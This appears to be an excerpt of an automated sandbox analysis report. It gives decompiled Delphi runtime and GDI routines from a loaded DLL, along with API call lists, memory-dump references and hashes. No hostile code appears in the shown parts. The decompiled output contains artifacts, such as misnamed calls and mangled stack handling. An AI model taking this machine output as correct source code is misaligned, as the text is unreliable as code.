                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID:
                          • API String ID: 3213498283-3916222277
                          • Opcode ID: de30f8bec98a9c1b1706d675172bbdd95e578e3d8167b05a4832f2f23a99874a
                          • Instruction ID: b5fd93c35cbf4aeb4dc645064dbe57f7795b022e3c15fc3ee229b7c4b8b42648
                          • Opcode Fuzzy Hash: de30f8bec98a9c1b1706d675172bbdd95e578e3d8167b05a4832f2f23a99874a
                          • Instruction Fuzzy Hash: AC419B74A00144DFCB60EFBCC895899B7F5EF9A3007240998E480DB3D2DB38AD81DB02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 45%
                          			E00722024(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                          				char _v5;
                          				struct HDC__* _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _t29;
                          				struct tagBITMAPINFO* _t32;
                          				intOrPtr _t39;
                          				struct HBITMAP__* _t43;
                          				void* _t46;
                          
                          				_t32 = __ecx;
                          				_t43 = __eax;
                          				L00721ED4(__eax, _a4, __ecx);
                          				_v12 = 0;
                          				_push(0);
                          				L00706590();
                          				_v16 = 0;
                          				_push(_t46);
                          				_push(0x7220c1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t46 + 0xfffffff4;
                          				if(__edx != 0) {
                          					_push(0);
                          					_push(__edx);
                          					_t29 = _v16;
                          					_push(_t29);
                          					L007066F0();
                          					_v12 = _t29;
                          					_push(_v16);
                          					L007066C8();
                          				}
                          				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                          				_pop(_t39);
                          				 *[fs:eax] = _t39;
                          				_push(E007220C8);
                          				if(_v12 != 0) {
                          					_push(0);
                          					_push(_v12);
                          					_push(_v16);
                          					L007066F0();
                          				}
                          				return DeleteDC(_v16);
                          			}

                          0x0072202d
                          0x00722031
                          0x0072203a
                          0x00722041
                          0x00722044
                          0x00722046
                          0x0072204b
                          0x00722050
                          0x00722051
                          0x00722056
                          0x00722059
                          0x0072205e
                          0x00722060
                          0x00722062
                          0x00722063
                          0x00722066
                          0x00722067
                          0x0072206c
                          0x00722072
                          0x00722073
                          0x00722073
                          0x00722091
                          0x00722097
                          0x0072209a
                          0x0072209d
                          0x007220a6
                          0x007220a8
                          0x007220ad
                          0x007220b1
                          0x007220b2
                          0x007220b2
                          0x007220c0

                          APIs
                            • Part of subcall function 00721ED4: GetObjectA.GDI32(?,00000054), ref: 00721EE8
                          • 7378A590.GDI32(00000000), ref: 00722046
                          • 7378B410.GDI32(?,?,00000000,00000000,007220C1,?,00000000), ref: 00722067
                          • 7378B150.GDI32(?,?,?,00000000,00000000,007220C1,?,00000000), ref: 00722073
                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0072208A
                          • 7378B410.GDI32(?,00000000,00000000,007220C8,?,00000000), ref: 007220B2
                          • DeleteDC.GDI32(?), ref: 007220BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$B410$A590B150BitsDeleteObject
                          • String ID:
                          • API String ID: 3290156324-0
                          • Opcode ID: 3ee6a0b2c46e88b648510291e836c060c4cc7a0128ceb59666ca065ec7bcd58b
                          • Instruction ID: 1bbb34442d0d0bf60fa812c93502cf440d4e5dbc23f80930977483c04fe49341
                          • Opcode Fuzzy Hash: 3ee6a0b2c46e88b648510291e836c060c4cc7a0128ceb59666ca065ec7bcd58b
                          • Instruction Fuzzy Hash: D7118CB5A00204FBDB20DBA8CC95F9EBBECAF48700F508564B914E72D2D678D910C764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00721864(struct HDC__* __eax, signed int __ecx) {
                          				char _v1036;
                          				signed int _v1038;
                          				struct tagRGBQUAD _v1048;
                          				short _v1066;
                          				short* _t15;
                          				void* _t18;
                          				struct HDC__* _t23;
                          				void* _t26;
                          				short* _t31;
                          				short* _t32;
                          
                          				_t31 = 0;
                          				 *_t32 = 0x300;
                          				if(__eax == 0) {
                          					_v1038 = __ecx;
                          					E007028C8(_t26, __ecx << 2,  &_v1036);
                          				} else {
                          					_push(0);
                          					L00706590();
                          					_t23 = __eax;
                          					_t18 = SelectObject(__eax, __eax);
                          					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                          					SelectObject(_t23, _t18);
                          					DeleteDC(_t23);
                          				}
                          				if(_v1038 != 0) {
                          					if(_v1038 != 0x10 || E007217CC(_t32) == 0) {
                          						E0072165C( &_v1036, _v1038 & 0x0000ffff);
                          					}
                          					_t15 = _t32;
                          					_push(_t15);
                          					L007065B8();
                          					_t31 = _t15;
                          				}
                          				return _t31;
                          			}
                          0x0072186f
                          0x00721871
                          0x00721879
                          0x007218b3
                          0x007218c1
                          0x0072187b
                          0x0072187b
                          0x0072187d
                          0x00721882
                          0x00721886
                          0x0072189f
                          0x007218a6
                          0x007218ac
                          0x007218ac
                          0x007218cc
                          0x007218d4
                          0x007218ea
                          0x007218ea
                          0x007218ef
                          0x007218f1
                          0x007218f2
                          0x007218f7
                          0x007218f7
                          0x00721904

                          APIs
                          • 7378A590.GDI32(00000000,00000000,?,?,007253E7,?,?,?,?,00723EE7,00000000,00723F73), ref: 0072187D
                          • SelectObject.GDI32(00000000,00000000), ref: 00721886
                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,007253E7,?,?,?,?,00723EE7), ref: 0072189A
                          • SelectObject.GDI32(00000000,00000000), ref: 007218A6
                          • DeleteDC.GDI32(00000000), ref: 007218AC
                          • 7378A8F0.GDI32(?,00000000,?,?,007253E7,?,?,?,?,00723EE7,00000000,00723F73), ref: 007218F2
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378ObjectSelect$A590ColorDeleteTable
                          • String ID:
                          • API String ID: 747582061-0
                          • Opcode ID: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
                          • Instruction ID: 3db1b9ca3360ffbe48dde1ace52c558d88ddf324fff4daa86efe920d192a0d88
                          • Opcode Fuzzy Hash: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
                          • Instruction Fuzzy Hash: BF01B561604320E2E214B769AC5BA6B72EDAFD0720F54DA1DB588972C2E67DC81483A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E00719850(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                          				CHAR* _v8;
                          				void* __ecx;
                          				void* _t18;
                          				void* _t23;
                          				CHAR* _t24;
                          				void* _t25;
                          				struct HRSRC__* _t30;
                          				void* _t31;
                          				struct HINSTANCE__* _t32;
                          				_Unknown_base(*)()* _t33;
                          
                          				_v8 = _t24;
                          				_t32 = __edx;
                          				_t23 = __eax;
                          				_t30 = FindResourceA(__edx, _v8, _a4);
                          				 *(_t23 + 0x10) = _t30;
                          				if(_t30 == 0) {
                          					EnumWindows(_t33);
                          				}
                          				_t5 = _t23 + 0x10; // 0x7198f4
                          				_t31 = LoadResource(_t32,  *_t5);
                          				 *(_t23 + 0x14) = _t31;
                          				if(_t31 == 0) {
                          					EnumWindows(_t33);
                          				}
                          				_t7 = _t23 + 0x10; // 0x7198f4
                          				_push(SizeofResource(_t32,  *_t7));
                          				_t8 = _t23 + 0x14; // 0x719568
                          				_t18 = LockResource( *_t8);
                          				_pop(_t25);
                          				return E00719528(_t23, _t25, _t18);
                          			}
                          0x00719857
                          0x0071985a
                          0x0071985c
                          0x0071986c
                          0x0071986e
                          0x00719873
                          0x00719876
                          0x0071987b
                          0x0071987c
                          0x00719886
                          0x00719888
                          0x0071988d
                          0x00719890
                          0x00719895
                          0x00719896
                          0x007198a0
                          0x007198a1
                          0x007198a5
                          0x007198ae
                          0x007198b9

                          APIs
                          • FindResourceA.KERNEL32(00700000,?,?), ref: 00719867
                          • EnumWindows.USER32 ref: 00719876
                          • LoadResource.KERNEL32(00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?,?,?,?,?,0076BB73,0000000A,0000001F), ref: 00719881
                          • EnumWindows.USER32 ref: 00719890
                          • SizeofResource.KERNEL32(00700000,007198F4,00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?,?,?,?,?,0076BB73), ref: 0071989B
                          • LockResource.KERNEL32(00719568,00000000,00700000,007198F4,00700000,007198F4,007154E8,00700000,00000001,?,?,007197C1,?), ref: 007198A5
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Resource$EnumWindows$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3300621414-0
                          • Opcode ID: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
                          • Instruction ID: 0c2f131d48dcdab0f0c7ed046faae67479347fe56bd8c01f070b18c5801fcc7d
                          • Opcode Fuzzy Hash: 8cd8de71b59c484ff7f639ff1c74d5e670da148cea41797eeb8666ebfbaf92ad
                          • Instruction Fuzzy Hash: 3DF0A4B3604204EF8745EE6CAC95D9B77ECDE893A03100169FA0CD7386DA38DE5243B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00720F48(void* __eax) {
                          				void* _t36;
                          
                          				_t36 = __eax;
                          				UnrealizeObject(E00720724( *((intOrPtr*)(__eax + 0x14))));
                          				SelectObject( *(_t36 + 4), E00720724( *((intOrPtr*)(_t36 + 0x14))));
                          				if(E00720804( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                          					SetBkColor( *(_t36 + 4),  !(L0071FA64(E007206E8( *((intOrPtr*)(_t36 + 0x14))))));
                          					return SetBkMode( *(_t36 + 4), 1);
                          				} else {
                          					SetBkColor( *(_t36 + 4), L0071FA64(E007206E8( *((intOrPtr*)(_t36 + 0x14)))));
                          					return SetBkMode( *(_t36 + 4), 2);
                          				}
                          			}
                          0x00720f49
                          0x00720f54
                          0x00720f66
                          0x00720f75
                          0x00720faf
                          0x00720fc0
                          0x00720f77
                          0x00720f89
                          0x00720f9a
                          0x00720f9a

                          APIs
                            • Part of subcall function 00720724: CreateBrushIndirect.GDI32(?), ref: 007207CE
                          • UnrealizeObject.GDI32(00000000), ref: 00720F54
                          • SelectObject.GDI32(?,00000000), ref: 00720F66
                          • SetBkColor.GDI32(?,00000000), ref: 00720F89
                          • SetBkMode.GDI32(?,00000002), ref: 00720F94
                          • SetBkColor.GDI32(?,00000000), ref: 00720FAF
                          • SetBkMode.GDI32(?,00000001), ref: 00720FBA
                            • Part of subcall function 0071FA64: GetSysColor.USER32(?), ref: 0071FA6E
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                          • String ID:
                          • API String ID: 3527656728-0
                          • Opcode ID: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
                          • Instruction ID: 06702887bd7f8c03420d442c9576a7f737ebd03edaf346f048b7d38717546cf8
                          • Opcode Fuzzy Hash: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
                          • Instruction Fuzzy Hash: 10F07DB5641210DBDF40FFB8EADAD0A67D8AF443157044590F908DF297CA6DD8208B71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070B6B4(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v273;
                          				char _v534;
                          				char _v790;
                          				struct _MEMORY_BASIC_INFORMATION _v820;
                          				char _v824;
                          				intOrPtr _v828;
                          				char _v832;
                          				intOrPtr _v836;
                          				char _v840;
                          				intOrPtr _v844;
                          				char _v848;
                          				char* _v852;
                          				char _v856;
                          				char _v860;
                          				char _v1116;
                          				void* __edi;
                          				struct HINSTANCE__* _t40;
                          				intOrPtr _t51;
                          				struct HINSTANCE__* _t53;
                          				void* _t69;
                          				void* _t73;
                          				intOrPtr _t74;
                          				intOrPtr _t83;
                          				intOrPtr _t86;
                          				intOrPtr* _t87;
                          				void* _t93;
                          
                          				_t93 = __fp0;
                          				_v8 = __ecx;
                          				_t73 = __edx;
                          				_t87 = __eax;
                          				VirtualQuery(__edx,  &_v820, 0x1c);
                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                          					_t40 =  *0x76f668; // 0x700000
                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                          					_v12 = E0070B6A8(_t73);
                          				} else {
                          					_v12 = _t73 - _v820.AllocationBase;
                          				}
                          				E007089EC( &_v273, 0x104, E0070C79C(0x5c) + 1);
                          				_t74 = 0x70b834;
                          				_t86 = 0x70b834;
                          				_t83 =  *0x707204; // 0x707250
                          				if(E00703400(_t87, _t83) != 0) {
                          					_t74 = E00704528( *((intOrPtr*)(_t87 + 4)));
                          					_t69 = E00708988(_t74, 0x70b834);
                          					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                          						_t86 = 0x70b838;
                          					}
                          				}
                          				_t51 =  *0x76e2dc; // 0x706fb4
                          				_t16 = _t51 + 4; // 0xffe8
                          				_t53 =  *0x76f668; // 0x700000
                          				LoadStringA(E00705388(_t53),  *_t16,  &_v790, 0x100);
                          				E007031C4( *_t87,  &_v1116);
                          				_v860 =  &_v1116;
                          				_v856 = 4;
                          				_v852 =  &_v273;
                          				_v848 = 6;
                          				_v844 = _v12;
                          				_v840 = 5;
                          				_v836 = _t74;
                          				_v832 = 6;
                          				_v828 = _t86;
                          				_v824 = 6;
                          				E00709010(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                          				return E00708988(_v8, _t86);
                          			}
                          0x0070b6b4
                          0x0070b6c0
                          0x0070b6c3
                          0x0070b6c5
                          0x0070b6d1
                          0x0070b6e0
                          0x0070b70a
                          0x0070b710
                          0x0070b71c
                          0x0070b721
                          0x0070b727
                          0x0070b727
                          0x0070b745
                          0x0070b74a
                          0x0070b74f
                          0x0070b756
                          0x0070b763
                          0x0070b76d
                          0x0070b771
                          0x0070b778
                          0x0070b781
                          0x0070b781
                          0x0070b778
                          0x0070b792
                          0x0070b797
                          0x0070b79b
                          0x0070b7a6
                          0x0070b7b3
                          0x0070b7be
                          0x0070b7c4
                          0x0070b7d1
                          0x0070b7d7
                          0x0070b7e1
                          0x0070b7e7
                          0x0070b7ee
                          0x0070b7f4
                          0x0070b7fb
                          0x0070b801
                          0x0070b81d
                          0x0070b830

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0070B6D1
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0070B6F5
                          • GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070B710
                          • LoadStringA.USER32 ref: 0070B7A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID: Prp
                          • API String ID: 3990497365-3740376554
                          • Opcode ID: 3403390dc3698bf674d2c4a264162b309b78ef3fc0ea61a9ac33420bcb5273bc
                          • Instruction ID: 66a43075f6424d3adcecac822c004026dd99201293f627bdb61538a014f83f88
                          • Opcode Fuzzy Hash: 3403390dc3698bf674d2c4a264162b309b78ef3fc0ea61a9ac33420bcb5273bc
                          • Instruction Fuzzy Hash: 06410171A00258DBDB21DB68CC85BDAB7FCAB18301F4442E6E548E7292D7789F84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070B6B2(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v273;
                          				char _v534;
                          				char _v790;
                          				struct _MEMORY_BASIC_INFORMATION _v820;
                          				char _v824;
                          				intOrPtr _v828;
                          				char _v832;
                          				intOrPtr _v836;
                          				char _v840;
                          				intOrPtr _v844;
                          				char _v848;
                          				char* _v852;
                          				char _v856;
                          				char _v860;
                          				char _v1116;
                          				void* __edi;
                          				struct HINSTANCE__* _t40;
                          				intOrPtr _t51;
                          				struct HINSTANCE__* _t53;
                          				void* _t69;
                          				void* _t74;
                          				intOrPtr _t75;
                          				intOrPtr _t85;
                          				intOrPtr _t89;
                          				intOrPtr* _t92;
                          				void* _t105;
                          
                          				_t105 = __fp0;
                          				_v8 = __ecx;
                          				_t74 = __edx;
                          				_t92 = __eax;
                          				VirtualQuery(__edx,  &_v820, 0x1c);
                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                          					_t40 =  *0x76f668; // 0x700000
                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                          					_v12 = E0070B6A8(_t74);
                          				} else {
                          					_v12 = _t74 - _v820.AllocationBase;
                          				}
                          				E007089EC( &_v273, 0x104, E0070C79C(0x5c) + 1);
                          				_t75 = 0x70b834;
                          				_t89 = 0x70b834;
                          				_t85 =  *0x707204; // 0x707250
                          				if(E00703400(_t92, _t85) != 0) {
                          					_t75 = E00704528( *((intOrPtr*)(_t92 + 4)));
                          					_t69 = E00708988(_t75, 0x70b834);
                          					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                          						_t89 = 0x70b838;
                          					}
                          				}
                          				_t51 =  *0x76e2dc; // 0x706fb4
                          				_t16 = _t51 + 4; // 0xffe8
                          				_t53 =  *0x76f668; // 0x700000
                          				LoadStringA(E00705388(_t53),  *_t16,  &_v790, 0x100);
                          				E007031C4( *_t92,  &_v1116);
                          				_v860 =  &_v1116;
                          				_v856 = 4;
                          				_v852 =  &_v273;
                          				_v848 = 6;
                          				_v844 = _v12;
                          				_v840 = 5;
                          				_v836 = _t75;
                          				_v832 = 6;
                          				_v828 = _t89;
                          				_v824 = 6;
                          				E00709010(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                          				return E00708988(_v8, _t89);
                          			}
                          0x0070b6b2
                          0x0070b6c0
                          0x0070b6c3
                          0x0070b6c5
                          0x0070b6d1
                          0x0070b6e0
                          0x0070b70a
                          0x0070b710
                          0x0070b71c
                          0x0070b721
                          0x0070b727
                          0x0070b727
                          0x0070b745
                          0x0070b74a
                          0x0070b74f
                          0x0070b756
                          0x0070b763
                          0x0070b76d
                          0x0070b771
                          0x0070b778
                          0x0070b781
                          0x0070b781
                          0x0070b778
                          0x0070b792
                          0x0070b797
                          0x0070b79b
                          0x0070b7a6
                          0x0070b7b3
                          0x0070b7be
                          0x0070b7c4
                          0x0070b7d1
                          0x0070b7d7
                          0x0070b7e1
                          0x0070b7e7
                          0x0070b7ee
                          0x0070b7f4
                          0x0070b7fb
                          0x0070b801
                          0x0070b81d
                          0x0070b830

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0070B6D1
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0070B6F5
                          • GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070B710
                          • LoadStringA.USER32 ref: 0070B7A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID: Prp
                          • API String ID: 3990497365-3740376554
                          • Opcode ID: 671a0df4136df44b78e3aa40a358bfd46bcc5b69e41d84091ca9513a50971042
                          • Instruction ID: 7e88ba56a25eb977ad5fc1b95d74dec5e15f1141ee003684c129d3b5cab44376
                          • Opcode Fuzzy Hash: 671a0df4136df44b78e3aa40a358bfd46bcc5b69e41d84091ca9513a50971042
                          • Instruction Fuzzy Hash: A6410D70A00258DBDB21EB68CC85BDAB7FCAB18301F4442E5E548E7292DB789F84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0071CAB6(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v5;
                          				intOrPtr* _v12;
                          				long _v16;
                          				char _v20;
                          				char _v24;
                          				long _t22;
                          				char _t29;
                          				void* _t53;
                          				intOrPtr _t61;
                          				intOrPtr* _t62;
                          				intOrPtr _t63;
                          				intOrPtr _t66;
                          				intOrPtr _t67;
                          				void* _t72;
                          				void* _t73;
                          				intOrPtr _t74;
                          
                          				_t72 = _t73;
                          				_t74 = _t73 + 0xffffffec;
                          				_push(__esi);
                          				_push(__edi);
                          				_t53 = __eax;
                          				_t22 = GetCurrentThreadId();
                          				_t62 =  *0x76e314; // 0x76f034
                          				if(_t22 !=  *_t62) {
                          					_v24 = GetCurrentThreadId();
                          					_v20 = 0;
                          					_t61 =  *0x76e130; // 0x713cc8
                          					L0070B9FC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                          					L00703A00();
                          				}
                          				if(_t53 <= 0) {
                          					E0071CA90();
                          				} else {
                          					E0071CA9C(_t53);
                          				}
                          				_v16 = 0;
                          				_push(0x76f870);
                          				L00706368();
                          				_push(_t72);
                          				_push(0x71cc46);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				_v16 = InterlockedExchange(0x76c404, _v16);
                          				_push(_t72);
                          				_push(0x71cc27);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                          					_t29 = 0;
                          				} else {
                          					_t29 = 1;
                          				}
                          				_v5 = _t29;
                          				if(_v5 == 0) {
                          					L16:
                          					_pop(_t63);
                          					 *[fs:eax] = _t63;
                          					_push(E0071CC2E);
                          					return E00703274(_v16);
                          				} else {
                          					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                          						_v12 = E0071707C(_v16, 0);
                          						E00716F6C(_v16, 0);
                          						L007064A8();
                          						 *[fs:eax] = _t74;
                          						 *[fs:eax] = _t74;
                          						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x71cbf1, _t72, 0x76f870);
                          						_pop(_t66);
                          						 *[fs:eax] = _t66;
                          						_t67 = 0x71cbc2;
                          						 *[fs:eax] = _t67;
                          						_push(E0071CBF8);
                          						_push(0x76f870);
                          						L00706368();
                          						return 0;
                          					} else {
                          						goto L16;
                          					}
                          				}
                          			}
                          0x0071cab9
                          0x0071cabb
                          0x0071cabf
                          0x0071cac0
                          0x0071cac1
                          0x0071cac3
                          0x0071cac8
                          0x0071cad0
                          0x0071cad7
                          0x0071cada
                          0x0071cae4
                          0x0071caf1
                          0x0071caf6
                          0x0071caf6
                          0x0071cafd
                          0x0071cb08
                          0x0071caff
                          0x0071cb01
                          0x0071cb01
                          0x0071cb0f
                          0x0071cb12
                          0x0071cb17
                          0x0071cb1e
                          0x0071cb1f
                          0x0071cb24
                          0x0071cb27
                          0x0071cb38
                          0x0071cb3d
                          0x0071cb3e
                          0x0071cb43
                          0x0071cb46
                          0x0071cb4d
                          0x0071cb58
                          0x0071cb5c
                          0x0071cb5c
                          0x0071cb5c
                          0x0071cb5e
                          0x0071cb65
                          0x0071cc11
                          0x0071cc13
                          0x0071cc16
                          0x0071cc19
                          0x0071cc26
                          0x0071cb6b
                          0x0071cc0b
                          0x0071cb7a
                          0x0071cb82
                          0x0071cb8c
                          0x0071cb9c
                          0x0071cbaa
                          0x0071cbb5
                          0x0071cbba
                          0x0071cbbd
                          0x0071cbdb
                          0x0071cbde
                          0x0071cbe1
                          0x0071cbe6
                          0x0071cbeb
                          0x0071cbf0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0071cc0b

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0071CAC3
                          • GetCurrentThreadId.KERNEL32 ref: 0071CAD2
                          • RtlEnterCriticalSection.KERNEL32(0076F870), ref: 0071CB17
                          • InterlockedExchange.KERNEL32(0076C404,?), ref: 0071CB33
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                          • String ID: LXq
                          • API String ID: 2380408948-3550559040
                          • Opcode ID: da5d096b80c2e3719e5c063d7e7f99ff6ec0d95e6f91ffa7921161fc8be4518e
                          • Instruction ID: 074f9ba7fe3f2bce352827ca45e0e156a12b79bd37435d9e55f30b1246493f5b
                          • Opcode Fuzzy Hash: da5d096b80c2e3719e5c063d7e7f99ff6ec0d95e6f91ffa7921161fc8be4518e
                          • Instruction Fuzzy Hash: 78217CB0A84348EEE712DBA8C856BAEB7F8EB05300F5185A4E504D72D1D77C9D90CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			// Delphi System-unit start-up code, not sample logic: reads
                          			// HKLM\SOFTWARE\Borland\Delphi\RTL\FPUMaskValue (a per-machine override of the
                          			// x87 exception mask) and merges its low 6 bits into the default 8087 control
                          			// word at 0x76c020 as (cw & 0xFFC0) | (value & 0x3F). The success path does the
                          			// same merge: RegCloseKey returns to the pushed address 0x703154, which is the
                          			// merge block shown in the failing branch.
                          			E007030DC() {
                          				void* _v8;
                          				char _v12;
                          				int _v16;
                          				signed short _t12;
                          				signed short _t14;
                          				intOrPtr _t27;
                          				void* _t29;
                          				void* _t31;
                          				intOrPtr _t32;
                          
                          				_t29 = _t31;
                          				_t32 = _t31 + 0xfffffff4;
                          				_v12 =  *0x76c020 & 0x0000ffff;
                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                          					_t12 =  *0x76c020; // 0x27f
                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                          					 *0x76c020 = _t14;
                          					return _t14;
                          				} else {
                          					_push(_t29);
                          					_push(E0070314D);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t32;
                          					_v16 = 4;
                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                          					_pop(_t27);
                          					 *[fs:eax] = _t27;
